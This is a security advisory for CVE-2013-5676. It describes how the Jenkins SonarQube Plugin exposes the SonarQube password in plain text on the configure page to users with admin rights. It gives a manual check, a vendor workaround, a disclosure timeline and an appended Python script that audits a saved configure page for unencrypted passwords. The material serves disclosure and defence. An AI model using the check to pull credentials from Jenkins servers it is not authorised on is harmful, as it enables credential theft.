ID: PACKETSTORM:138333
Type: packetstorm
Reporter: Christian Catalano
Modified: 2016-08-13T00:00:00
Description
`###################################################
1. ### Advisory Information ###
Title: SonarQube Jenkins Plugin - Plain Text Password
Date published: 2013-12-05
Date of last update: 2013-12-05
Vendors contacted: SonarQube and Jenkins CI
Discovered by: Christian Catalano
Severity: High
2. ### Vulnerability Information ###
CVE reference: CVE-2013-5676
CVSS v2 Base Score: 9.0
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Component/s: Jenkins SonarQube Plugin
Class: plain text password
3. ### Introduction ###
Jenkins CI is an extensible open-source continuous integration server
(http://jenkins-ci.org).
Jenkins SonarQube Plugin allows you to trigger SonarQube analysis from
Jenkins CI using either a:
- Build step to trigger the analysis with the SonarQube Runner
- Post-build action to trigger the analysis with Maven
http://docs.codehaus.org/display/SONAR/Jenkins+Plugin
4. ### Vulnerability Description ###
The default installation and configuration of the Jenkins SonarQube Plugin
in Jenkins CI is prone to a security vulnerability.
This vulnerability could be exploited by a remote attacker (a malicious
Jenkins user with Manage Jenkins enabled) to obtain the SonarQube
credentials.
5. ### Technical Description / Proof of Concept Code ###
Below is a harmless test that can be executed to check whether a Jenkins
SonarQube Plugin installation is vulnerable.
Using a browser with a web proxy, go to the following URL:
https://jenkinsserver:9444/jenkins/configure
Check the parameter "sonar.sonarPassword" in the Sonar installations section.
A vulnerable installation will show the password in plain text.
6. ### Business Impact ###
An attacker (a malicious Jenkins user with Manage Jenkins enabled) can
obtain the SonarQube credentials.
7. ### Systems Affected ###
This vulnerability was tested against:
Jenkins CI v1.523 and SonarQube Plugin v3.7
Older versions are probably affected too, but they were not checked.
8. ### Vendor Information, Solutions and Workarounds ###
The "sonar.password" property can be encrypted with the SonarQube
encryption mechanism:
http://docs.codehaus.org/display/SONAR/Settings+Encryption
The sonar.password property has only been encryptable since SonarQube v3.7.
9. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
August 21st, 2013: Vulnerability identification
September 4th, 2013: Vendor notification [Jenkins CI]
November 19th, 2013: Vulnerability confirmation [Jenkins CI]
November 29th, 2013: Vendor notification [SonarQube]
December 2nd, 2013: Vendor solution [SonarQube]
December 6th, 2013: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################
`
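
The check from section 5 and the workaround from section 8, combined into an offline audit over a saved copy of your own /configure page. This is an added example, not part of the original advisory. Assumptions: values produced by SonarQube settings encryption carry the `{aes}` prefix and would appear unchanged in this field; the sample HTML and all helper names are constructed.

```python
from html.parser import HTMLParser

FIELD = "sonar.sonarPassword"  # parameter name given in the advisory
ENC_PREFIX = "{aes}"           # marker on SonarQube-encrypted setting values

# Constructed sample: two Sonar installations on a saved /configure page.
SAMPLE_HTML = """
<form name="config">
  <input type="text" name="other.field" value="x">
  <input type="password" name="sonar.sonarPassword" value="constructed-secret">
  <input type="password" name="sonar.sonarPassword" value="{aes}Q09OU1RSVUNURUQ=" />
</form>
"""


class _InputCollector(HTMLParser):
    """Collects (type, value) for every <input> named FIELD."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("name") == FIELD:
            self.fields.append((a.get("type", "text").lower(), a.get("value", "")))


def classify(value):
    """Return 'empty', 'encrypted' or 'plaintext' for one field value."""
    if not value:
        return "empty"
    if value.startswith(ENC_PREFIX) and len(value) > len(ENC_PREFIX):
        return "encrypted"
    return "plaintext"


def audit_configure_page(html):
    """One finding per Sonar installation; the secret itself is never returned."""
    parser = _InputCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for idx, (input_type, value) in enumerate(parser.fields):
        findings.append({
            "installation": idx,
            # A masked input (type=password) still carries its value in the
            # response body, so the verdict depends on the value, not the type.
            "input_type": input_type,
            "state": classify(value),
            "length": len(value),
        })
    return findings


def has_exposure(findings):
    """True if any installation still serves a cleartext password."""
    return any(f["state"] == "plaintext" for f in findings)


if __name__ == "__main__":
    for finding in audit_configure_page(SAMPLE_HTML):
        print(finding)
```

Any installation reported as `plaintext` should have its SonarQube password rotated and re-entered in encrypted form.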